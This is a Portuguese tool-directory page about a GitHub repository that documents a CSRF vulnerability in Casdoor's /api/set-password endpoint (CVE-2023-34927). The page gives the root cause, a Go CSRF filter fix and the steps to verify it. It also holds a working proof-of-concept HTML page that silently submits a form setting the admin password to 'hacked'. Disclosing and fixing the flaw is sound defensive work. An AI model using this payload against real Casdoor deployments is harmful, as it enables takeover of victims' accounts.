Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
csrf_casdoor — Prova de conceito de exploit CSRF para o endpoint `/api/set-password` do Casdoor (CVE-2023-34927), permitindo alterações não autorizadas de senha através de requisições POST entre sites. Inclui uma correção de filtro CSRF baseada em Go. | Kitploit
Ferramentas/GitHubGitHub/vanlam2001/csrf_casdoor
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticação
GitHubvanlam2001/csrf_casdoor

csrf_casdoor

Prova de conceito de exploit CSRF para o endpoint `/api/set-password` do Casdoor (CVE-2023-34927), permitindo alterações não autorizadas de senha através de requisições POST entre sites. Inclui uma correção de filtro CSRF baseada em Go.

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Casdoor – Falsificação de Solicitação entre Sites (CSRF)

Resumo

  • Vulnerabilidade: CSRF em /api/set-password permitindo alterações de senha sem consentimento.
  • Versões afetadas: Todas as versões do software são afetadas. Nenhuma versão corrigida está disponível atualmente.
  • CVE: CVE-2023-34927 (último ainda não atribuído).
  • Autor do exploit: Van Lam Nguyen.
  • Testado em: Windows

Impacto

  • Se uma vítima estiver logada no Casdoor, um POST entre sites pode alterar a senha da vítima (ex.: built-in/admin), levando à tomada de conta.

Pré-requisitos do Ataque

  • A vítima está autenticada e possui um cookie casdoor_session_id válido.
  • A vítima visita uma página maliciosa que envia automaticamente um POST para /api/set-password.

Prova de Conceito

root@kitploit:~
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>
</html>

Causa Raiz

  • Endpoints que alteram estado em /api/* aceitam solicitações autenticadas por cookie sem aplicar verificações de mesma origem (Origin/Referer) ou tokens CSRF.

Visão Geral da Correção

  • Adicionar um filtro CSRF no lado do servidor para negar solicitações entre sites baseadas em cookie dos métodos POST/PUT/DELETE/PATCH em /api/*.
  • Permitir solicitações que carregam autenticação explícita não baseada em cookie (ex.: Authorization, autenticação Basic, credenciais de cliente ou accessToken) ou solicitações sem cookies de sessão do navegador (típicas de chamadas servidor para servidor).

Implementação

  • Use o routers.CSRFFilter implementado em csrf_filter.go. Este filtro:
    • Retorna precocemente para métodos que não alteram estado.
    • Permite solicitações com autenticação explícita não baseada em cookie.
    • Bloqueia solicitações entre sites quando um cookie de sessão está presente e a origem não corresponde ao host.

Como Integrar no Casdoor

  1. Copie csrf_filter.go para o pacote routers existente do projeto Casdoor. Não modifique ou exclua nada neste arquivo.
  2. Registre o filtro no início do pipeline HTTP (dentro de main):
    root@kitploit:~
    // Beego v1 style
    beego.InsertFilter("/api/*", beego.BeforeRouter, routers.CSRFFilter)
    
    // If your project uses Beego v2 and imports as `web`:
    // web.InsertFilter("/api/*", web.BeforeRouter, routers.CSRFFilter)
    

Verificação

  • Após registrar o filtro, reproduza a PoC acima enquanto estiver logado. A solicitação deve ser negada com Unauthorized operation e o servidor deve registrar CSRF check failed.
  • Chamadas de API entre origens que incluam cabeçalhos Authorization ou parâmetros accessToken devem continuar funcionando.

Arquivos do Repositório

  • csrf_filter.go: Filtro CSRF para copiar para o pacote routers do Casdoor.
  • poc.html: Página mínima reproduzindo o ataque CSRF.
  • README.md: Este documento descrevendo a vulnerabilidade e as etapas de correção.

Referências

  • Casdoor: https://casdoor.org/
  • Version: https://github.com/casdoor/casdoor/releases
  • https://vulmon.com/vulnerabilitydetails?qid=CVE-2023-34927

Vídeo

  • Youtube: https://youtu.be/N5VENgiObjY
Baixar ferramenta